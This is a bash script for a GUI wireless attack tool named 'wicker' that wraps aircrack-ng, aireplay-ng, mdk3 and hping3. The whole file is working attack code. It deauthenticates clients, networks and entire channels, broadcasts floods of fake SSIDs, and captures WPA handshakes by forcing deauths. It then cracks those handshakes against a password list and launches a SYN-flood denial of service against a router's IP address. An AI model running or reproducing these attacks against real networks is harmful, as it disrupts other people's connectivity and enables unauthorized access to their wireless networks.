#!/usr/bin/env bash

#tool-name: wicker (the wireless hacker)
#author: akrecH

#color codes
B='\e[1m'
r='\e[31m'
g='\e[1;32m'
y='\e[1;33m'
b='\e[1;34m'
p='\e[1;35m'
s='\e[0m'
bl='\e[5m'


#network interface
phy=$(basename /sys/class/net/wl*)

if [ "$phy" == "wl*" ];
then
   phy='not found'
fi

#detect Ctrl + C
trap_ctrlc () {
tput bel

ask=0
if zenity --question --text "⚠️ Are you sure you want to quit?" --no-wrap ;
then ask=1
else
ask=0
fi

if [ $ask == 1 ];
then
exit 0

elif [ $ask == 0 ];
then
menu
fi
}

trap "trap_ctrlc" 2


#turn on monitor mode
on () {
(echo "10" ; sleep 1
echo "# 🥷🏼Turning on monitor mode..." ; sleep 1
sudo xterm -T "☠️wicker☠️" -e "airmon-ng check kill"
echo "20" ; sleep 1

echo "# 🥷🏼Trying to make ${phy} interface down..." ; sleep 1
sudo xterm -T "☠️wicker☠️" -e "ip link set ${phy} down"
echo "50" ; sleep 1

echo "# 🥷🏼Changing the interface name from ${phy} to wlan0mon" ; sleep 1
sudo xterm -T "☠️wicker☠️" -e "ip link set ${phy} name wlan0mon"
echo "75" ; sleep 1

echo "# 🥷🏼Changing card mode from managed to monitor..." ; sleep 1
sudo xterm -T "☠️wicker☠️" -e "iw dev wlan0mon set type monitor"
echo "100" ; sleep 1
) | zenity --progress \
--title="☠️wicker☠️" \
--text="🥷🏼Turning on monitor mode..." \
--percentage=0 \
--auto-close --no-cancel --width=300

zenity --info --title="☠️wicker☠️" --text="👽Monitor mode turned on successfully" --width=300

menu
}



#turn off monitor mode
off () {

(echo "10" ; sleep 1
echo "# Turning off monitor mode..." ; sleep 1
sudo xterm -T "☠️wicker☠️"  -e "ip link set wlan0mon up"
echo "20" ; sleep 1

echo "# 🥷🏼Turning interface mode managed from monitor..." ; sleep 1
sudo xterm -T "☠️wicker☠️"  -e "iw dev wlan0mon set type managed"
echo "50" ; sleep 1

echo "# 🥷🏼Trying to restart Network manager..." ; sleep 1
sudo xterm -T "☠️wicker☠️"  -e "service NetworkManager restart"
echo "75" ; sleep 1

echo "# 🥷🏼Network manager restarted..." ; sleep 1
echo "100" ; sleep 2
) | zenity --progress \
--title="☠️wicker☠️" \
--text="🥷🏼Turning off monitor mode..." \
--percentage=0 \
--auto-close --no-cancel --width=300

zenity --info --title="☠️wicker☠️" --text="📡Monitor mode turned off..." --width=300

menu
}



#check injection
aireplay () {
sudo aireplay-ng -9 wlan0mon
menu
}




#run airodump-ng [4]
airodump_ask () {

r=$(zenity --info --title '🛸airodump-ng' --text 'Scan single target🥷🏼 or directly run airodump-ng' --extra-button single --extra-button full --ok-label back --width=400)

if [ -z $r ];
then
menu

elif [ "$r" == "full" ];
then
reset;
sudo airodump-ng wlan0mon


else
airodump_run
fi
}

airodump_run () {
if [ "$r" == "single" ];
then
loot=`iwlist wlan0mon scan | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'`
bssid=`zenity --list --title="🛸airodump-ng" --text="Enter BSSID address" --cancel-label="Enter manually" --column="BSSID" $loot --width=500 --height=350`

fi

if [ -z $bssid ];
then
bssid=$(zenity --entry --title="🛸airodump-ng" --text="Enter target BSSID" --width=400 )
reset;
sudo airodump-ng --bssid $bssid wlan0mon

elif [ -z $bssid ];
then
zenity --error --title="☠️wicker☠️" --width=250

else
reset;
sudo airodump-ng --bssid $bssid wlan0mon

fi
}



#deauth wifi if single[5]
kicks () {
if [ "$r" == "s" ] || [ "$r" == "S" ];
then
loot=`iwlist wlan0mon scan | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'`
bssid=`zenity --list --title="🕷Deauth wifi" --cancel-label="enter manually" --column="BSSID" $loot --width=500 --height=350`
fi

if [ -z $bssid ]
then
sudo xterm -T "all local wifi networks | press (Ctrl-C) to stop me" -e "airodump-ng wlan0mon" &

bssid=$(zenity --entry --title="🕷Deauth wifi" --text="enter target BSSID" --width=500 )

mac=$(zenity --entry --title="🕷Deauth wifi" --text="enter client MAC address" --width=500 )

num=$(zenity --entry --title="🕷Deauth wifi" --text="enter the number of deauth req (default: 200) " --width=300)

[ -z $num ] && num=200

sudo killall xterm 2>/dev/null
sudo xterm -T "Sending deauth packets to the client" -e "aireplay-ng --deauth $num -a $bssid -D -c $mac wlan0mon"
zenity --info --title="☠️wicker☠️" --text="Process complete\nSent $num deauth packets to the client $mac of $bssid" --width=400
menu

else
mac=$(zenity --entry --title="🕷Deauth wifi" --text="enter client MAC address" --width=500 )

num=$(zenity --entry --title="🕷Deauth wifi" --text="enter the number of deauth req (default: 200) " --width=300)

[ -z $num ] && num=200
sudo killall xterm 2>/dev/null
sudo xterm -T "Sending deauth packets to the client" -e "sudo aireplay-ng --deauth $num -a $bssid -D -c $mac wlan0mon"
zenity --info --title="☠️wicker☠️" --text="Process complete\nSent $num deauth packets to the client $mac of $bssid" --width=400
menu

fi
}

#deauth wifi if full
kickf () {
loot=`iwlist wlan0mon scan | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}'`
bssid=`zenity --list --title="🕷Deauth wifi" --column="BSSID" --cancel-label="enter manually" $loot --width=500 --height=350`

if [ -z $bssid ];
then

sudo xterm -T "all local wifi networks | press (Ctrl-C) to stop me" -e "airodump-ng wlan0mon" &

bssid=$(zenity --entry --title="🕷Deauth wifi" --text="enter target BSSID" --width=500)

num=$(zenity --entry --title="🕷Deauth wifi" --text="enter the number of deauth req (default: 200)" --width=300)

[ -z $num ] && num=200

sudo killall xterm 2>/dev/null
sudo xterm -T "Sending deauth packets to the client" -e "aireplay-ng --deauth $num -D -a $bssid wlan0mon"
zenity --info --title="☠️wicker☠️" --text="Process complete\nSent $num deauth packets to $bssid" --width=400
menu

else
num=$(zenity --entry --title="🕷Deauth wifi" --text="enter the number of deauth req (default: 200)" --width=300)

[ -z $num ] && num=200

sudo killall xterm 2>/dev/null
sudo xterm -T "Sending deauth packets to the client" -e "sudo aireplay-ng --deauth $num -D -a $bssid wlan0mon"
zenity --info --title="☠️wicker☠️" --text="Process complete\nSent $num deauth packets to $bssid" --width=400
menu

fi
}



#deauth wifi channel
mdk () {

channel=$(zenity --entry --title="🕸️Deauth wifi channel" --text="enter channel number" --width=400)

if [ -z $channel ];
then
zenity --error --width=250


else
sudo xterm -T "All local wifi networks | press (Ctrl-C) to stop me" -e "airodump-ng wlan0mon" &
echo -e "${B}${y}[!]${r}Press ( Ctrl + C ) to stop${s}"
sudo mdk3 wlan0mon d -c $channel
fi
}



#create multiple fake ssid
mdk1 () {
channel=$(zenity --entry --title="🕵🏻‍♂️Create multiple fake SSID" --text="Enter channel number" --width=300)

if [ -z $channel ];
then
zenity --error --width=250
menu
fi

zenity --info --title="🕵🏻‍♂️Create multiple fake SSID" --text="Select a (.txt) file which cotains the SSID names" --width=300

txt=$(zenity --file-selection)

if [ -z $txt ];
then
zenity --error --width=250
menu
fi

zenity --info --title="🕵🏻‍♂️Create multiple fake SSID" --text="Multiple SSID created successfully\nPress Ctrl+C to stop" --width=300 &

sudo xterm -T "Hosting fake Wifi SSID" -e  "cat $txt && mdk3 wlan0mon b -c $channel -f $txt"
menu

}



#capture handshake
handshake () {
sudo xterm -T "All local wifi networks | press (Ctrl-C) to stop me" -e "airodump-ng wlan0mon" &

bssid=`zenity --list --title="🕸️Capture handshake" --cancel-label="Enter manually" --text="select BSSID" --column="BSSID" $loot --width=500 --height=400`

if [ -z "$bssid" ];
then
bssid=$(zenity --entry --title="🕸️Capture handshake" --text="Enter target BSSID" --width=400 )
fi

if [ -z $bssid ];
then
zenity --error --width=250
menu
fi

xterm -T "Making a directory for (.cap) files" -e "rm -rf /tmp/WICKER-CAPS && mkdir /tmp/WICKER-CAPS"


(
echo "# 🥷🏼Saving captured packet in /tmp/WICKER-CAPS..." ; sleep 1
sudo xterm -T "Trying to capture handshake" -e "airodump-ng --bssid ${bssid} --write '/tmp/WICKER-CAPS/captured-handshake-${bssid}' wlan0mon" &
sleep 1


echo "# 🥷🏼Saved cap file as captured-handshake-${bssid}.cap..." ; sleep 1
sudo xterm -T "Trying to deauthenticate users from the wifi" -e "aireplay-ng --deauth 200 -D -a ${bssid} wlan0mon" &

sleep 1

echo "# 🥷🏼Deauth process started..." ; sleep 1

sleep 1

echo "# 🥷🏼Trying to capture handshake..." ; sleep 1

for i in {0..100}
do
echo $i ; sleep 1
done

) | zenity --progress \
--title="☠️wicker☠️" \
--text="🕸️Capture handshake" \
--percentage=0 \
--auto-close --no-cancel --time-remaining --width=300

#find the .cap file
file=`find /tmp/WICKER-CAPS -name "captured-handshake-*.cap"`

#wicker default passwordlist
pass=/usr/share/wicker/passwords.txt

#check is there any handshake captued on not
if aircrack-ng $file -w $pass | grep -q "EAPOL"
then
opinion=0
`zenity --question --title= --text="🔐Handshake Captured\nFile:${file}\n🔓Try to crack it?" --width=300` && opinion=1 || opinion=0

sudo killall xterm 2>/dev/null

#if user select Yes
[ "$opinion" == "1" ] && check_pass=`zenity --info --extra-button="Enter manually" --title="☠️wicker☠️" --text="💾Use default passlist?\n📄$pass\n 📄or select manually" --width=300`

[ "$check_pass" == "Enter manually" ] && pass=`zenity --file-selection` && aircrack-ng $file --bssid $bssid -w $pass

[ "$check_pass" != "Enter manually" ] && aircrack-ng $file --bssid $bssid -w $pass


#if user select No
[ "$opinion" == "0" ] && menu


#if handshake not captured
else
asK=0
`zenity --question --title="☠️wicker☠️" --text="🟡Process complete...\n🔴No handshake captured\n🔵Try again?" --width=300` && asK=1 || asK=0

sudo killall xterm 2>/dev/null
file=""
[ "$asK" == "1" ] && handshake
[ "$asK" == "0" ] && menu

fi
}



#router dos
router () {

ip=$(zenity --entry --title="🚀Router DOS" --text="Enter the routers IP address" --width=400)

if [ -z "$ip" ]
then
zenity --error --text="⚠️Please enter a valid IP address" --width=250
menu

else
sudo xterm -T "Performing DOS on $ip | Press Ctrl+C to stop" -e  "hping3 -i u1 -S $ip"
menu
fi
}


menu () {
c=$(zenity --list --radiolist --title="☠️Network interface ${phy}️ ☠️" --text="Select an option" --column="Select" --column="Menu Item" \
FALSE "Capture handshake" \
FALSE "Deauth wifi" \
FALSE "Deauth channel" \
FALSE "Create multiple fake SSID" \
FALSE "Run airodump-ng" \
FALSE "Router DOS" --cancel-label="exit" --ok-label="ok" --extra-button="check injection" --extra-button="Turn off monitor mode" --extra-button="Turn on monitor mode" --height=350 )

if [ "$c" == "Turn on monitor mode" ];
then
on


elif [ "$c" == "Turn off monitor mode" ];
then
off



elif [ "$c" == "Run airodump-ng" ];
then
airodump_ask


elif [ "$c" == "Deauth wifi" ];
then
r=$(zenity --info --title '🕸️Deauth wifi' --text 'Attack on a clients MAC address or directly BSSID?' --extra-button Client --extra-button BSSID --ok-label back --width=400)

[ -z $r ] && menu

[ "$r" == "BSSID" ] && kickf


[ "$r" == "Client" ] && kicks


elif [ "$c" == "Deauth channel" ];
then
mdk

elif [ "$c" == "Create multiple fake SSID" ];
then
mdk1


elif [ "$c" == "Capture handshake" ];
then
handshake


elif [ "$c" == "Router DOS" ];
then
router



elif [ "$c" == "check injection" ];
then
aireplay



elif [ "$c" == "" ];
then
exit 0

fi
}
menu
